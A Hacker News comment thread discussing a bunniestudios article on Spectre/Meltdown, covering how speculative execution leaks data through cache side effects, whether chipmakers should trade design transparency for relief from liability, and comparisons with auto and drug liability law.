Hacker News new | past | comments | ask | show | jobs | submit login
Spectre/Meltdown Pits Transparency Against Liability (bunniestudios.com)
196 points by beardicus on Feb 1, 2018 | hide | past | favorite | 87 comments



After seeing comments around the Internet on the article, one thing I wanted to add is this:

The question is not whether Intel would accept a settlement of documentation instead of money, or whether Spectre/Meltdown are bugs or not.

The question is whether /you/ would offer an exchange of documentation for release of liability. Whether or not the maker accepts the offer is orthogonal to whether you are willing to take the first step in breaking the vicious cycles that keeps hardware closed.

If you're not willing to give any allowance for the fact that sharing documentation exposes makers to more liability, then stop demanding transparency. Nobody should be obligated to put themselves in harm's way solely for your benefit or as intellectual entertainment. Likewise, learn to live with proprietary drivers, undocumented bugs, backdoors, and potential exploits hidden in your hardware, because without a transparency compromise, none of these problems will have a sustainable solution.


The question is whether /you/ would offer an exchange of documentation for release of liability. Whether or not the maker accepts the offer is orthogonal to whether you are willing to take the first step in breaking the vicious cycles that keeps hardware closed.

As an individual I would be more than happy to make the exchange. The pitchfork-carrying crowd that rants online? - most would be happy to make the exchange as well i believe.

The important question in my opinion is, are their business partners willing to absolve them of any liability in exchange for transparency? I don't think it makes sense for them - I don't think it makes sense in any business.


I don't trust the companies to be held accountable in court anyway. Open it up and let the market punish those who release buggy hardware with reputation loss!


The compromise is that you don't prefer transparent competitors, or launch lawsuits against them. Events like Spectre might represent a sustainable solution if the law gives the backlash teeth.


Halfway through he notes how processors have millions of transistors, each being slightly different, and notes how we are just soooo lucky to have found a hardware bug now.

Except both Spectre and Meltdown, AFAIK (IANAHWE) are design flaws as the silicon is working as intended. The hardware is fine -- the real problem is that the Intel's reputation is partially built on speed, and, now that the cladding has fallen off, we've discovered the platform was built with really flimsy supports.


> Halfway through he notes how processors have millions of transistors, each being slightly different, and notes how we are just soooo lucky to have found a hardware bug now.

I read that as the other way around. He says:

> We should all be more surprised that it took so long for a major hardware bug to be found, than the fact that one was ever found.

Which I would read as, "it's surprising we don't discover bugs in hardware more often".

I would also say, that in the world of embedded devices, HW bugs in silicon are the norm, and your chips come with some form of errata.


And it's not just embedded devices. AMD and Intel put out tons of errata too.


IDK, I think there's a way to have your cake and eat it too WRT chip level optimizations.

For instance brushing off rings 1 and 2 from the dust bin of history could give user and kernel code ways to describe multiple levels of memory protection in a way that the chip can understand. That way, the same way that AMD was protected from Meltdown ("I can tell from the TLB that address is outside of what this code is supposed to touch, so I'm not going to speculate past that") could be expanded to a more general form.


I didn't even know rings 1 and 2 were even relegated to the dustbin.... so everything is ring 0 now??

Which brings me to another something I don't understand about this. If mispredictions leave their calculations in cache why can't that cached data be cleared after the branch is determined to be bad?


> I didn't even know rings 1 and 2 were even relegated to the dustbin.... so everything is ring 0 now??

It's all either ring 3 (user) or ring 0 (kernel) for the purposes of this discussion. The biggest architectural impediment is the single bit for ring selection in page table entries. And since long mode requires paging, there's currently not a way to select rings 1 and 2.

Although you might be able to play with some of the hypervisor extensions to give you guest ring 0 context inside a regular user process... See Akaros for a good example of what that looks like.

> Which brings me to another something I don't understand about this. If mispredictions leave their calculations in cache why can't that cached data be cleared after the branch is determined to be bad?

Because the cache is a fixed size, and that just kicks the can down the road. You'll just test for the eviction in your exploit instead.


If mispredictions leave their calculations in cache why can't that cached data be cleared after the branch is determined to be bad?

"Clearing the cached data" is just as detectable as caching the data in the first place. You'd have to treat the line fill as a transaction that could be rolled back. Unfortunately, transactional memory and CPU caches lie at polar-opposite ends of the performance spectrum.


You don't have to roll it back, you could have speculated loads store into a speculation buffer rather than directly into the cache, then at retirement the spec buffer entry is committed to the cache.


Perhaps, but isn't the time taken by the line fill ultimately what's leaking the information? Sure, it's probed by monitoring L1 eviction, but I'd still be nervous about the timing.

IMHO the only safe way to do a fetch from prohibited memory is to not do it at all.


No, you can't time what happens on the mis-speculated path itself. What's leaking the information is the change to the cache state which is observable after the original mis-speculated branch is resolved (by timing subsequent accesses to addresses that alias in the cache).

You can also observe changes to the TLB state, though - so you'd have to do the same buffering-and-commit dance there as well.

Maybe you can also leak data through the BTB or RTB (double-Spectre!), or by tieing up particular execution units conditionally which is observable by a sibling hyperthread?


How would ring 1 and ring 2 help? The PTE has a supervisor bit saying that pages are mapped but not accessible outside ring 0 code. That information cached in the TLB. Intel’s problem is that it speculatively executes memory instructions before checking this bit.


Right, it totally wouldn't help current Intel processors. This is totally a future microarchtectural change. Also, there's not really a way to use Rings 1 and 2 in long mode since long mode requires paging to be enabled and the PTEs only have the one bit for ring selection.

But (given the idea that we're talking about future chips) it could help describe protection boundaries in a finer grain way to protect against Spectre in the same way that AMD is protected against Meltdown.

The main issue with spectre (in a long term sense) is that the CPU really has no way of understanding that you're running lower privileged code in a higher context, whether that be BPF in the kernel, or JS in the browser. IMO, we're going to be fighting the same battle over and over again as the all of the mitigations so far are heavily microarchitecure specific.


BPF in the kernel was just for the sake of expediency. The point is that the BPF code shows a somewhat common pattern that real kernel code also uses. The “real” exploit is finding a syscall that falls into that pattern somewhere


Absolutely. There's memory unsafety bugs that'll allow you to ROP, and probably otherwise valid code that doesn't need unsafety that'll speculatively hit user memory in current kernels.

But in the context of trends, we're moving towards User^Kernel memory mapping with features SMAP. That idea combined with kernel changes to holistically enforce separation boundaries more effectively along with cache partitioning AFAICT leads to potential end game win on this front.

Edit: And to be totally up front my major side project is adding a BPF/seccomp esque virtual machine into a formally verified kernel, so my head is in that space.


Ah okay I get it.


Can you please unpack "really flimsy supports" in ELI5 language? I dont get that part of your comment - though I was surprised IN understood your "I am not a hardware engineer" fluidly...

But define "flimsy supports"


> Can you please unpack "really flimsy supports" in ELI5 language?

Modern CPUs rely upon "speculative execution" for speed, i.e. running code that they guess will be run. This usually works, but relies upon the CPU getting rid of the results of its incorrect guesses. Intel CPUs failed to do this in a very obvious way, which was recently exploited. As a result, they broke software security checks.

EDIT: Let's say your code is

    if (security_check()) {
      secure_stuff();
    } else {
      error();
    }
The Intel CPU may guess that security_check() will return true, and run secure_stuff(). When security_check() actually returns false, it doesn't clean up all of the results of running secure_stuff(), so error() can spy on what it would have done if security_check() returned true.


“Results” is a loaded term. In computation, “results” means the return value of a computation. Intel does keep you from observing the result of secure_stuff. What it doesn’t do is clean up all the side effects.


Speculative execution modifies observable state. What you call it is imaterial.


The point there is that what spectre/meltdown exploits are sideffects that are not part of the architectural state as it is specified by any manufacturer. The whole issue points to the fact that security-wise the typical approach used for descriptions of CPU's architectural behavior is insufficient as there can be implementation-specific observable sideeffects that have security ramifications.


Words have meaning. The “result” of a computation is different from side effects. The distinction is important. Speculative execution will always modify “observable state.” E.g. power usage.


'Results' and 'side-effects' are useful modifiers of 'modifies observable state', and the long-overlooked fact that the latter falls into the category is an important insight. I think you would find it very difficult to explain the problem or discuss possible solutions without making additional distinctions, beyond 'modifies observable state', with regard to what speculative execution does.


ELI5 is an internet acronym for "Explain like I'm five (years old)". In this example, "secure_stuff" may well be a call to a function that does not return any value. Some functions are like that. But if it isn't, we no longer are sure that the code in the else branch of the loop won't be able to deduce what would be returned as the result, thanks to Intel, no thanks to Intel.

Shame on you.


Personal attacks are not allowed on HN and we ban accounts that do this. Please post civilly and substantively, or not at all.

https://news.ycombinator.com/newsguidelines.html


Intel valued speed optimizations that are inherently insecure.


ah.

Hmm.

I worked at intel in the 90s... Ran the game lab - when they came out with the Celeron, they created SIMD instructions - and they paid (bribed) game companies to optimize their games against the instruction set - fofr $1MM in marketing bonuses.... (i.e. "play gameX on intels celeron based PCs and achieve X% performance gain")

And all of this was to prove that they could produce a <$1,000 machine that a consumer would want (the basis of the celeron proc)


I am referring to their flawed implementation of speculative execution, with respect to how much of today's CPU performance is due to it.


> Intel's reputation is partially built on speed

Except the Spectre vulnerability isn't specific to Intel's chips.


Stanford's EE 380 had a talk on these vulnerabilities yesterday, from the Red Hat guy working on mitigations. There were some CPU designers in the audience. (Not Hennessey, though.)

The general comments were that Meltdown is a huge and easy to exploit vulnerability. Under Linux, any process can effectively read all of kernel RAM. There are straightforward software and hardware mitigations available. The next generation of CPUs should have that fixed.

Spectre is much harder to exploit and much tougher to fix. It's not an inevitable problem with speculative execution. IBM Z-series mainframes apparently don't have this problem. But it's going to be tough.

The real problem is all that hardware and software out there in the field vulnerable to Meltdown. There will be unpatched systems for years to come. That's what worries the RedHat guy. They have customers wanting patches to old kernels they no longer support.


I was also there, and that was _one of the things_ that worried Jon Masters (the guy from Red Hat). In general, there seemed (to me) to be a consensus that as long as you had access to high-resolution timing (like RDTSC), and any form of speculation/prediction (even in in-order pipelines), then you could have exploits.

The recording will eventually be up at https://www.youtube.com/playlist?list=PLoROMvodv4rMWw6rRoeSp..., but I can't recommend it. Unfortunately, Mr. Masters spent most of the ~75 minutes on introductory material (a fairly common mistake at EE380). The best discussion happened in the additional hour after the official end of the talk (and of the recording).

In fact, Pro Tip to people presenting at EE380 (and, for that matter, most "Company X wants to show us Y" meetings that I've attended): Take your slide deck, and delete the first 40% of it.


In early statements, AMD was claiming its processors are immune to Meltdown but vulnerable to some variants of Spectre [1]. Has it now been determined that AMD processors are also vulnerable to the former? (or have the criteria evolved?) I can find statements going either way, but I am not sure if they are precise.

[1] https://developer.amd.com/wp-content/resources/Managing-Spec...


> The real problem is all that hardware and software out there in the field vulnerable to Meltdown. There will be unpatched systems for years to come. That's what worries the RedHat guy. They have customers wanting patches to old kernels they no longer support.

What uses cases involve running new untrusted code on legacy unsupported systems?


> What uses cases involve running new untrusted code on legacy unsupported systems?

Well yes, you shouldn't be doing that (particularly the 'unsupported' bit). The thinking here, I suppose, is that Meltdown makes privilege escalation straightforward once a malicious party has access to the system via another vector.

In my company, we run self-hosted physical servers (i.e. we're the only user on the systems) and debated whether to disable the page table isolation fix since we were seeing about a 30% performance hit.

The decision we took was that we would accept the performance hit since Meltdown means that any unauthorized entry into the system has a privilege escalation path since kernel memory is essentially readable by any process. (Quite an easy and quick decision, really.)


> The thinking here, I suppose, is that Meltdown makes privilege escalation straightforward once a malicious party has access to the system via another vector.

On an unpatched system, that's not likely to be hard in the first place.


The question that needs to be asked is this... were Intel subject to the same products liability laws as auto manufacturers or drug makers, would it make Meldown, Spectre and the ME vulnerabilities less likely? We know from other industries that products liability laws make for safer products, but we refuse to acknowledge that our CPU's are critical to safety because we don't pay much attention to how pervasively they are used, or the 2nd and 3rd order effects of flaws in the chips.

Its very possible, perhaps even likely, that Intel may profit more from the replacement of impacted chips, then it will lose settling various class action cases it faces. Its questionable if Intel's competition can or will grow manufacturing capacity such that Intel faces a real competitive threat.

It isn't that Intel is too big to be allowed to fail. Its that Intel is actually too big to fail; and that does not provide them the right incentives where product safety and quality is concerned in my opinion.


There are more questions that arise from this. For example if Intel were more vigilant and this lead to a 10x reduction in technological progress (CPU power has increased exponentially), how many lives would have been affected or even lost because cutting edge research that relies on super computers would happen 40 years from now?

If by making CPUs more secure, self-driving moves 30 years into the future, how many lives will this affect?

There is an old joke, about Bill Gates saying that if the automotive industry could move as fast as the computer industry, we would had $100 cars that do 1000 miles to the gallon and the GM chief answering that whilst these cars would exist, they would crash twice a day.


I'm very happy for self driving cars to move 30 years into the future if that means not leaving their CPUs open to known vulnerabilities.


1.25 million people die in auto-related accidents each year. That's one person every 25 seconds.

If you are willing to delay the onset of self-driving cars by 30 years, that's a lot of blood. I agree there is a balance point that's not 1.25x30 million - some will still die after self-driving cars are introduced. There may even be some vulnerabilities exploited (but I strongly doubt that hacks will amount to anything approaching 1.25 million people per year - the media will hype up crashes where the self driving car or its security system was at fault as if it did, while ignoring the everyday fatal accidents with nothing except maybe an advisory to avoid that road on your morning commute). And as critical safety issues like maximum speed enforcement, drunk driving enforcement, helmets on motorcycles, seat belts, and child restraints trickle down into developing countries and older used cars, the number per year will - I hope - drop.

But one or two more have died somewhere since you started reading this comment. Still want to delay it?


Everyone dies exactly once, no matter what they do, so I question whether driving causes any deaths at all. I think the comparison might need to be put in terms of quality adjusted person-years of life lost or something. People get tunnel vision when focused on optimizing a certain metric. If nobody was driving, how much would life expectancy go up?


That only strengthens the argument.

People die from heart disease, cancer, respiratory failure, Alzheimer's, strokes etc. in old age. Reducing one of those factors would give few additional high-quality person-years of life. Auto accidents bring death to younger people who, in the absence of that catastrophe, would be expected to live many more years.


Vulnerabilities always get used. There's no way forward that doesn't include more vigilance.


This is certainly true, the difficult part is to find a middle point between vigilance and sufficient progress rate.

Sometimes though, you can work in parallel. A consumer-grade CPU may for example be used in a airtight setup when increased security is needed.


> but we refuse to acknowledge that our CPU's are critical to safety because we don't pay much attention to how pervasively they are used

What kind of safety are we talking about? Nuclear power plants? Airplanes? Self-driving cars? If so, why would you be running untrusted, remote code on the CPUs of the critical components?

Sure, there occasionally are CPU bugs where the CPUs just randomly lock up, but we can defend against that with redundancy. The meltdown bug on the other hand requires malicious activity on the same chip, i.e. you need to offer an attacker a sandbox to run code on and then hope the sandbox holds and is properly resource-limited to not DoS your safety-critical system. It's a risk you shouldn't be taking in the first place.

And if we're just talking about credit card data well, we can easily compensate by moving to dedicated instances once such a problem becomes known, it's no worse than hypervisor escapes which become known every now and then.


There would need to be two separate products. One covered by higher liability intended for use in critical systems, and the other under the standard liability.

I imagine that the higher liability CPU would likely be slow, old, and very very expensive. But that is the compromise required on behalf of the consumer.


That's pretty much what the military and satellite operators buy. Older, simpler CPUs manufactured on larger nodes, radiation-hardened to boot and with years of proven track record and bug fixes.

And then they buy two or three per system for redundancy.


And they pay for that too. A RAD750 was about $200,000 each according to wikipedia.


I'd say that the hardening is the overwhelming motivator there. That's the reason to be on a huge node. If you're not worried about radiation, you could shrink the same design, making it cheaper and faster and have larger safety margins all at the same time.


What's a critical system? Is it okay for some things to have compromised security?


Safety and security are two different things that are very often at odds with each other.


It is not a question about safety, it is about security. To illustrate the difference, in an airport, safety is about properly maintaining planes and security is about keeping terrorists out.

If we exclude all potential issues except those related to meltdown and spectre, Intel chips are perfectly safe, the results are correct and there is no crash. It means that if they were safe to use in critical systems like engine control units, they still are.

Meltdown and spectre are security bugs, they are usually treated differently from safety problems like with cars and drugs.


>The question that needs to be asked is this... were Intel subject to the same products liability laws as auto manufacturers or drug makers, would it make Meldown, Spectre and the ME vulnerabilities less likely?

This is such an important question -- and why we cant rely on gov sections like the FCC (ajit pai) to resolve these issues -- These are questions that will be critical to the evolution to the digital humanity which we shall be forever-more.

So we need to evolve to a next level meta thought to humanities destiny.... we are too focused only now by petty thinking.

Need to solve this problem.


The question that needs to be asked is this... were Intel subject to the same products liability laws as auto manufacturers or drug makers, would it make Meldown, Spectre and the ME vulnerabilities less likely?

It would certainly make modern high-performance computing less likely.


In the case of Spectre/Meltdown, it's not simply a case of finding the vulnerabilities and patching them; the workarounds result in significant performance costs, and essentially mean the processors affected are now less capable than when they were sold. This incurs damages for the people whose computing is now slower / not fit for purpose, or who now have to buy more processors to meet their requirements. Openness is great, but I don't believe we should sell our guarantees for it, and put ourselves in a buyer beware situation.


Interestingly this is very similar to the case of VW Diesel engines. They were cutting corners for performance, and the cheap fix (software) incurs a performance and/or efficiency penalty of the same magnitude as the Spectre/Meltdown patches.

In that case, the outcome was significantly better for consumers in the US compared to elsewhere.

Are there any legal processes against Intel from customers?


VW intentionally misled buyers and regulators about the actual emissions of their cars. Unless Intel knew about Spectre/Meltdown when they were designing their chips, it's a pretty different situation legally speaking.


Agree. They did sell a product that doesn’t do what customers expect though, but I assume customers weren’t misled by that either simply because Intel don’t put performance figures on the boxes (and the theoretical performance is unchanged - it might be different if a manufacturer would e.g disable half the cache or cut clocks 15% to fix an honest design mistake)


They did know. Or at least there were papers about it back in the 90's.


Bunnie's logic seems impeccable. Let's put down the pitchforks -- for vendors that disclose.

That leaves plenty of uses for pitchforks...


Well, unfortunately that doesn't help in the current US legal climate with how class action lawsuits work.

Even if we as developers put down our pitchforks, a class action firm will jump on any perceived liability.


Openness and liability seem to be largely orthogonal in practice. While I agree with the author that there would be little in the way of open-source software if its developers could be held responsible for any flaws, there is a lot of commercial, closed software that is almost as well shielded from liability. On the other hand, drugs are open in the sense that their chemical formulae are known, yet their producers carry considerable liability.

The complexity of modern processors is very similar to that of software, and this should be taken into account, but if Intel is summarily absolved, it is more likely to join Microsoft and Apple in the 'closed, limited liability' corner, rather than keeping company with Linux and GNU.


> To simply say, “but hardware manufacturers should ship perfect products because they are taking my money, and my code can be buggy because it’s free of charge” – is naïve.

With respect to Bunnie – Why? I understand that a complex piece of hardware can never be completely bug-free. But if a bug renders the product unfit for purpose, does the manufacturer not have a legal obligation to either fix the bug or provide monetary compensation? And I'm not sure I buy the argument that this obligation makes manufacturers more likely to try to hide bugs. If they sell products with defects that are known but not disclosed to the customer, are they not committing fraud?


Yeah, I agree with you. There is no relationship, and definitely not a vendor relationship, between an open source developer and someone who downloads their work and uses it in exchange for nothing.

A more sensible position seems like "lets get the bugs out fast rather than having one per architecture for the next 100 years" and making it open. But I can see that being unwise depending on how long they think it will take and how much of a hit to their reputation.


I'm not quite buying the central point of this piece.

The author argues that transparency and liability are at odds, and cites Open Source Software as the main example to justify this.

But, there is a third aspect: Money. If you sell something to me, then I want both transparency and assurances of fitness for purpose. Even if it's not directly part of the contract, it's implied by consumer protection laws. (Maybe not everywhere, but .de seems to have pretty good consumer protection).

Open Source Software doesn't come without liability because of it's openness, but also because it's free as in beer.


You can want transparency all you want, but you're not going to get it. I guarantee that, in any large for-profit software product you use, the devs know of at least one unprivileged read bug which they will not disclose.


This is called ethics! Its interesting that the idea that a Fortune 500 company could behave ethically is immediately written off, indeed, not even discussed as a solution.


I don't think this makes much sense. Currently the Intel chips aren't open at all. If they were open, then this article might have a point - demanding that Intel replace or fix their broken products would indeed cause issues.

But that's the point. The hardware is not open. If anything, tightening warranty for closed hardware and loosening it for open hardware would likely have the opposite effect - it would make Intel open their code (if we follow the logic of the article).


His bargain (if I’ve understood) is that they should open the software and designs, or replace physical chips.


Partially related, does anyone know if AMD support on Linux is basically on par with Intel?


For CPU support, last I checked: yes. I was able to use AMD CPUs transparently.

Now on graphics cards support for Machine Learning applications AMD falls short of Nvidia, but that's a different processor.


AMD is working hard on the opensource AMDGPU Linux drivers, they have been working well for me. Unfortunately, AMD doesn't have parity with Nvidia's CUDA, there are nascent efforts to compete with ROCm/OpenCL, but CUDA is quite far ahead for ML applications. Sadly, upstream TF relies on CUDA and isn't showing any signs of supporting AMD GPUs.

I'm hoping the "No data center usage" clause Nvidia recently sprung in its license will encourage more people to develop for, or expend more effort on porting ML libraries and tools to AMD GPUs.


Also, AMD graphics card support for graphics applications is generally excellent, especially in the last few months with newer cards. AMD have released a fully open-source driver chain called AMDGPU, the only caveat being that it uses an open-source LLVM-based shader compiler toolchain that's somewhat slower on some workloads (and somewhat faster on others!) than whatever proprietary thing is in their blob drivers, which are called AMDGPU PRO.


What does the Spectre/Meltdown bug mean for a person planning to buy a new Windows 10 computer? Should I buy an AMD CPU based computer instead of an Intel based computer?


Isn't this what insurance is for?


I'd agree, although maybe it's not that simple. For insurance to work, actuaries need to be able to determine the risk with reasonable accuracy. For car crashes and medical malpractice there's a lot of statistics, for newly discovered hardware vulnerabilities, less so.


Fair enough. But the inherent complexity of a modern Intel hardware design surely puts at least a lower bound on the probability of bugs.


If there were a lower bound, then there would be no point in insuring against it. If I knew I will incur at least $1B a year in legal losses, then I'd budget for it. Insurance is for covering the upper bound.


The upper bound is just as important for working out an insurance premium...


There's a bit of apples to oranges comparison going on here between open hardware and open source software with regard to liability. The situation here is falling into the same trap that the RIAA/MPAA/Copyright institutes fall into when trying to compare piracy against theft of goods.

Open source software is usually provided free of charge and at the cost of 'time' by the developer. It's also often produced by the developer as part of every-day problem solving for something else, in which that something else is often a paid gig (i.e. releasing a generalized library that was used to solve a problem for an application that has paying users or for a customer's bespoke development effort), so even in that scenario it can be seen as being produced at no charge. Once 'produced', the product can create unlimited numbers of itself at zero cost.

Open source hardware comes in a few pieces: (1) The specification, which can be completely open and released without promise of warranty against defects and which comes with that transparency, (2) the actual hardware product, which is paid for by the customer, often at a profit but not required to be and (3) the software behind the hardware (bootloaders and such) which should also be free. There are costs involved in hardware production and purchase that do not exist in the software world[0]

Of these things, most consumers would expect the second to come with a warranty of some kind against defects and it would be an intelligent thing for a company -- even one operating as a non-profit -- to mark up the product enough to offer a suitable and clear warranty. In the case of Intel, a very for-profit entity who keeps its specification, documentation, and flaws under lock and key for the protection of its business and, quite rightly so, aims to sell its product in a manner that maximises profits for its shareholders, all consumers expect a product that is going to be warranty protected.

Where this gets tricky is explaining Spectre/Meltdown to the average non-technical person[1]. It's reasonable that Intel couldn't have noticed this flaw even if they were believed to be employing every possible method to ensure the protection and safety of their customers[2]. The complexities around this issue are very high and the company can reasonably be forgiven for missing the problem. But most consumers won't understand this -- what they will understand is that shortly after receiving the mitigation against the flaw, their shiny new processor got a whole lot slower, or their PC stopped booting. They'll blame Microsoft who will in-turn point the finger at Intel, and they'll join whatever class-action lawsuit fits most appropriately for them.

Personally, I don't see how they avoid a large recall effort similar to the one that happened with early Pentium models in the 90s where they had a flaw that led to calculations being incorrect -- a flaw that could be corrected in software, as well, but that was clearly a hardware flaw.

Will the same thing happen to an open-source chip with a hardware flaw? Probably, yes. Will it be targetted at the company that produces the chip or the group that produces the specification? If the two are not one-in-the-same, it'll probably be the responsibility of the chip producer to handle the warranty claims and might result in a hardware recall of sorts unless the issue is one of software running on the chip that can be patched. The difference is that open hardware might spot the problem before production, and even -- if not -- the problem will have many more eyes on it for providing solutions.

[0] See paragraph 1. I'm not saying software production is free of costs; but unlike hardware production, it's possible for software production to be completely free of costs.

[1] Hell, it's difficult explaining it to industry insiders.

[2] Something which, given the debacle around the Intel ME, is very debatable.


At this point, the only people that should be worrying about Spectre/Meltdown are cloud hosting providers. For individual users, Spectre/Meltdown attacks rely on malware processes running on your computer, and if that is happening, you have bigger problems to worry about.


Is some piece of JavaScript loaded in your browser one of those "bigger problems to worry about"? What about some Windows tool I download to help me run games in borderless fullscreen? What about videogame mods? And here I was hoping that running everything as a regular/non-admin user is sufficiently secure...

People say "you need to have malware running on your system" as if it's not normal to run other people's code on a desktop system but it's actually very very common and why priviledge separation and user sandboxing is being done in modern operating systems. JavaScript has been successfully shown it can be used to exploit at least one of these bugs.


Javascript Spectre/Meltdown attacks are already effectively defeated through browser updates that reduce timer accuracy.


Is some piece of JavaScript loaded in your browser one of those "bigger problems to worry about"?

As soon as I hear of such an exploit in the wild, I'll panic. The demonstrations so far have consisted of arcane research papers and canned videos.

Send me a link to a PoC page that returns stored passwords, harvests cryptocurrency wallets, drops payloads, or otherwise screws with my unpatched system. Until then, I think people are grossly exaggerating how big a deal the Spectre/Meltdown exploits are.


JavaScript code running in a properly sandboxed modern browser can potentially exploit these vulnerabilities.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: